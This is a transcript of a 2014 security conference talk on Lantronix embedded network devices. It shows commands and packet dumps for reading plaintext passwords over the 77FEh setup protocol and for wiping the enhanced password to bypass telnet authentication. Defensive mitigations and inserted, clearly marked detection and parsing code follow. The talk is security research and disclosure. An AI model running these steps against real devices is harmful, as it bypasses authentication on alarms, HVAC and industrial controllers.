confidence 2014: vlatko kosturjak: exploring treasures of 77feh
TRANSCRIPT
1
MosEisleyLab
Confidence 2014
Exploring treasures of 77FEh: Getting access to Lantronix devices
Vlatko Kosturjak, Diverto (@k0st)
2
Who are you!?!!??
● Security Jedi at Diverto
– Bringing balance to the force
● Experience
– Offensive (Penetration tester)
– Defensive (Developer/System Administrator/...)
– Have code in: Nmap, Metasploit, OpenVAS, …
– Author of free software: https://github.com/kost/
● If you trust in certificates
– CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
3
Agenda
● Introduction - Lantronix
● Physical access
● WTF is 77FEh?
● Vulnerabilities & Exploitation
● Recommendations
● Questions and answers
45 minutes
4
Lantronix
Source: www.lantronix.com
5
You can find them as an integral part of
● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners - Roombas
● Embedded systems
● Industrial systems
Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight
6
What are they actually running?
● OS
– CoBos (mostly)
– Evolution OS/Linux
– ThreadX
– Linux
● Support
– 1 or more serial ports
– Modbus (few models)
– 10/100 Ethernet
7
Physical access
● Like usual
– Game over
● Serial access
– No password by design
● Requirements
– Standard TTL cable
– BusPirate
– ...
8
Connecting to serial port...
● 9600 bps 8/N/1
● Flow control: None
9
Most frequently available services – TCP/IP
● Web (tcp/80) – simple web server, serving an applet JAR which talks to port 30718
● Telnet (tcp/9999) – telnet administration interface
● 77FEh (tcp-udp/30718) – what is this?
● SNMP (udp/161) – mostly information disclosures
10
Device Discovery
● Ask :)
● Look if you have physical access
● Passive
● Active/Scanning
– Standard port scanning is fine with conservative timing
– Broadcast UDP to specific Lantronix ports (30718)
● Beware
– Version scanning (-sV) or running vulnerability scanners may misconfigure the device
11
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
12
So, WTF is 77FEh finally?
● 0x77FE = 30718 (decimal)
● TCP/UDP protocol for device setup
– Proprietary protocol
– Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
– Setup of device
– Administration of device
– Getting device info
– Insecurity (sorry, had to write it, you'll see later ;) )
13
Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
Annotations: query setup request (4 bytes); query setup response (4 bytes), device type, MAC address of the device (6 bytes)
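As an added example (not code from the talk or from lantronix-witchcraft), the decoder below takes the 30-byte query-setup response shown on the slide and pulls out the device type and MAC address, the two fields the slide annotates. The field positions (opcode in bytes 0-3, device type at bytes 8-11, MAC in the last six bytes) are inferred from the annotated dump, not from Lantronix documentation, and the OUI check only compares against the prefix seen in the slide's own sample. The use case is defensive: turning 30718 responders seen in a packet capture into an asset-inventory line.

```python
# Added example: decode the 77FEh "query setup" response captured on the slide.
# Not code from the talk or from lantronix-witchcraft. Field positions are
# inferred from the slide's annotated dump (assumption), not from vendor docs.
import binascii

LANTRONIX_PORT = 30718  # 0x77FE

# The 30-byte response shown on the slide, re-typed here as constructed input
SAMPLE_RESPONSE = binascii.unhexlify(
    "000000f7" "00108005" "58324400" "df0e0000"
    "62a7d944" "00000000" "00204a91" "84fb"
)

# OUI prefix of the MAC in the slide's sample (00:20:4a); used only as a
# sanity check that a 30718 responder looks like the same device family
SAMPLE_OUI = b"\x00\x20\x4a"


def parse_query_setup_response(data: bytes) -> dict:
    """Return opcode, device type and MAC from a 0x000000F7 query-setup response."""
    if len(data) < 12:
        raise ValueError("too short to be a query setup response")
    opcode = int.from_bytes(data[:4], "big")
    if opcode != 0xF7:
        raise ValueError(f"unexpected opcode 0x{opcode:08x}")
    # Device type is NUL-padded ASCII ("X2D" on the slide); a 4-byte width is an assumption
    device_type = data[8:12].split(b"\0", 1)[0].decode("ascii", "replace")
    mac = data[-6:]
    return {
        "opcode": opcode,
        "device_type": device_type,
        "mac": ":".join(f"{b:02x}" for b in mac),
        "same_oui_as_sample": mac[:3] == SAMPLE_OUI,
    }


def inventory_line(src_ip: str, data: bytes) -> str:
    """One asset-inventory line per responder, e.g. from a passive capture on port 30718."""
    info = parse_query_setup_response(data)
    return f"{src_ip} lantronix/{info['device_type']} mac={info['mac']}"


if __name__ == "__main__":
    print(inventory_line("192.168.1.101", SAMPLE_RESPONSE))
```

Feeding every response-direction datagram on port 30718 from a capture through `inventory_line` gives a list of devices that actually answer the setup protocol, which is the population that the later recommendations (disable or filter 77FEh) need to cover.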
14
Interesting request – #1
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....
[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............
Annotations: query setup (4 bytes); IPv4 (4 bytes); simple password in plaintext (4 bytes)
15
Previous work
● Metasploit
– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
● Tools
– Simple C program by jgor
● https://github.com/jgor/lantronix-telnet-pw
16
But...
● Simple password is not set
● Device still asks for password
● Further digging
– Enhanced password in place
– You cannot get/reset the enhanced password easily
– Length is bigger (4 -> 16)
– Challenge!!!
17
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no
18
Source: Mohdafri.com
19
Interesting request - #2
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)
Annotations: query ext version request (4 bytes); in the response, simple password in plaintext (4 bytes) and version (6 bytes)
20
Interesting request #3
● Request to query configuration
– 000000eX
● Response to query configuration
– 000000bX, followed by 126 bytes of setup
● X = setup record number (0 – F):
– 0 basic setup record (simple password, IP, ...)
– 1 security record (enhanced password, AES key, SNMP, ...)
– 2 specific products / situations
– 3 OEMs
– ...
Half wrong! The request for security record 1 provides just zero bytes!
21
Interesting request #4
● Request to change configuration
– 000000cX, followed by 126 bytes of setup
● Response to change configuration
– 000000bX
● X = setup record number (0 – F):
– 0 basic setup record
– 1 security record
– 2 specific products / situations
– 3 OEMs
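The opcodes on the last four slides (f6/f7 query setup, f8/f9 query setup with password, f4/f5 ext version, eX/bX query configuration record, cX set configuration record) are enough to write a detection rule for the protocol. The block below is an added example, not code from the talk or from lantronix-witchcraft: it classifies the first four bytes of a port-30718 payload and raises alerts for write opcodes and for any 77FEh traffic from hosts outside a management allowlist. The severity levels and the sample traffic are constructed for the example.

```python
# Added example: detection helper for 77FEh (TCP/UDP 30718) traffic, based on the
# opcode layout described on the slides. Not part of lantronix-witchcraft.
# Opcode meanings come from the slides; severities are an assumption for this example.
from dataclasses import dataclass

LANTRONIX_PORT = 30718

# Fixed four-byte opcodes shown on the slides
FIXED_OPCODES = {
    0xF6: ("query setup request", "info"),
    0xF7: ("query setup response", "info"),
    0xF8: ("query setup/password request", "high"),   # response carries the simple password
    0xF9: ("query setup/password response", "high"),
    0xF4: ("query ext version request", "info"),
    0xF5: ("query ext version response", "info"),
}

SETUP_RECORD_LEN = 126  # bytes following the 4-byte opcode in bX/cX messages


def classify_77fe(payload: bytes):
    """Map a 77FEh message to (name, record_number, severity); None if not 77FEh-shaped."""
    if len(payload) < 4 or payload[:3] != b"\0\0\0":
        return None
    op = payload[3]
    if op in FIXED_OPCODES:
        name, sev = FIXED_OPCODES[op]
        return (name, None, sev)
    family, record = op >> 4, op & 0x0F
    if family == 0xE:
        return ("query configuration record", record, "medium")
    if family == 0xB:
        # A 4-byte bX is the ack of a set request; a query response carries the record
        if len(payload) == 4 + SETUP_RECORD_LEN:
            return ("configuration record response", record, "medium")
        return ("configuration ack", record, "medium")
    if family == 0xC and len(payload) == 4 + SETUP_RECORD_LEN:
        # Record 1 is the security record (enhanced password, AES key, SNMP)
        sev = "critical" if record == 1 else "high"
        return ("set configuration record", record, sev)
    return None


@dataclass
class Datagram:
    src: str
    dst: str
    dport: int
    payload: bytes


def alerts_for(datagrams, allowed_sources):
    """Return alert tuples for 77FEh traffic from unexpected hosts or with sensitive opcodes."""
    out = []
    for d in datagrams:
        if d.dport != LANTRONIX_PORT:
            continue
        hit = classify_77fe(d.payload)
        if hit is None:
            continue
        name, record, sev = hit
        if d.src not in allowed_sources:
            # anything on 30718 from outside the management allowlist is worth a look
            out.append((d.src, d.dst, name, record, "high" if sev == "info" else sev))
        elif sev in ("high", "critical"):
            out.append((d.src, d.dst, name, record, sev))
    return out


# Constructed sample traffic (not captured data): an inventory query from the
# management host, a password query from a workstation, a security-record
# overwrite (opcode c1 + 126 bytes) from the same workstation, and unrelated HTTP.
SAMPLE = [
    Datagram("10.0.0.5", "10.0.0.50", 30718, b"\0\0\0\xf6"),
    Datagram("10.0.0.99", "10.0.0.50", 30718, b"\0\0\0\xf8"),
    Datagram("10.0.0.99", "10.0.0.50", 30718, b"\0\0\0\xc1" + b"\0" * 126),
    Datagram("10.0.0.99", "10.0.0.50", 8080, b"GET / HTTP/1.0\r\n"),
]

if __name__ == "__main__":
    for alert in alerts_for(SAMPLE, {"10.0.0.5"}):
        print(alert)
```

Run against the sample, the management host's query setup produces nothing, while the workstation's password query and its write to record 1 are both reported; the record-1 write is the event that the next slides show removing the enhanced password, so it is the one to page on.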
22
Setting setup record 1 for security
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....
Annotations: set setup record 1 (security) request; SNMP community string (13 bytes); enhanced password (16 bytes); response 000000b1 = setting setup record 1 was successful
23
Enhanced password gone, no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
24
Authentication Algorithm Guess
● Authenticate
– Enhanced password set: ask for enhanced password; password OK: display setup menu
– Enhanced password not set, simple password set: ask for simple password; password OK: display setup menu
– Enhanced password not set, simple password not set: display setup menu
25
New tool: lantronix-witchcraft
● 77FEh protocol implementation
● 77FEh security related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
– https://github.com/kost/lantronix-witchcraft
26
Basic usage:
● Display MAC address:
– ./lantronix-witchcraft.pl -Q <ip>
● Display Simple Password (up to 4 characters)
– ./lantronix-witchcraft.pl -P <ip>
● Reset Security record (together with enhanced password)
– ./lantronix-witchcraft.pl -E <ip>
● Reset Security record without AES (with enhanced password)
– ./lantronix-witchcraft.pl -S <ip>
● Dump setup records
– ./lantronix-witchcraft.pl -G -D <ip>
27
Brave enough?
● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
– ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
28
Still wondering why automatic scanning is bad for Lantronix?
● Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
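The dump above is the slide's evidence that a scanner's probe ended up written into a setup record. As an added example (not code from the talk or from lantronix-witchcraft), the block below re-types those five hexdump lines as constructed input, rebuilds the raw bytes, and extracts the printable text so that a dumped record can be checked for content that does not belong in a configuration. Treating the bytes as UTF-16 big-endian is an assumption based on the `00 xx` byte pattern in the dump; the original record layout is not documented on the slide.

```python
# Added example: rebuild the setup-record bytes from the slide's hexdump and
# flag foreign text inside them. Not code from the talk or lantronix-witchcraft.
# UTF-16BE decoding is an assumption drawn from the 00 xx byte pattern.
import re

# The five hexdump lines from the slide, re-typed here as constructed input
DUMP = """\
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
"""

# offset, 1..16 hex bytes, then the |ascii| column
LINE = re.compile(r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s+){1,16})\|")


def parse_hexdump(text: str) -> bytes:
    """Rebuild raw bytes from canonical hexdump lines, refusing dumps with gaps."""
    out = bytearray()
    expected = None
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if expected is not None and offset != expected:
            raise ValueError(f"gap in dump at 0x{offset:x}")
        chunk = bytes.fromhex("".join(m.group(2).split()))
        out += chunk
        expected = offset + len(chunk)
    return bytes(out)


def printable_runs(data: bytes, min_len: int = 8) -> list:
    """Return runs of at least min_len printable ASCII characters, decoding as UTF-16BE."""
    text = data.decode("utf-16-be", errors="replace")
    return re.findall(r"[ -~]{%d,}" % min_len, text)


def record_looks_tampered(data: bytes) -> bool:
    """True when a setup record carries a long human-readable string (a scanner artefact)."""
    return bool(printable_runs(data))


if __name__ == "__main__":
    record = parse_hexdump(DUMP)
    for run in printable_runs(record):
        print(repr(run))
```

Decoded, the record contains `NSPlayer/9.0.0.2980; {0000AA00-0A00-0...`, which has the form of a media-player HTTP User-Agent header (an observation about the sample, not something the slide states): the device stored a request it received on its setup port as configuration. Comparing `record_looks_tampered` results before and after any scan of a network with these devices is a cheap way to notice the misconfiguration the slide warns about.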
29
Correct way
● Ask
– Ask someone responsible whether they have something like that
● Send broadcast query packet to 77FEh
● Identify ports 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
– If yes, perfect
– If not: huh, but you should restore setup records somehow ;)
30
It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation
31
Disclosure Problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report to?
– Lantronix – I guess they know their protocol ;)
– OEMs – hard to find all their customers ;)
● Awareness
– Conference
– Tools
32
But maybe it could be done...
● Add white list
● Encryption/SSL?
Source: Lantronix documentation
33
Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet to the administration interface only through VPN or another secure channel
● Disable 77FEh if not needed
● Filter out 77FEh on network devices to only allowed ones
● Disable other unnecessary services (SNMP, telnet, etc.)
34
Summary
Source: duki@fb
35
Summary
● There are ways to pass beyond authentication (if 77FEh is enabled)
– Simple passwords
– Enhanced passwords
● Tools
– Metasploit Lantronix modules
– https://github.com/kost/lantronix-witchcraft
● Recommendations
– Disable 77FEh if not needed, or filter out 77FEh on network devices to only allowed ones
– Tunnel all communication to these devices over VPN/SSL
● Future
– There are things to research: a way to obtain the enhanced password or AES keys, for example
36
Acknowledgements - Thanks
● Previous work (Simple Passwords)
– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
– Dalibor Dosegović, hardware wizard
37
Thank you!
Questions and Answers (@k0st)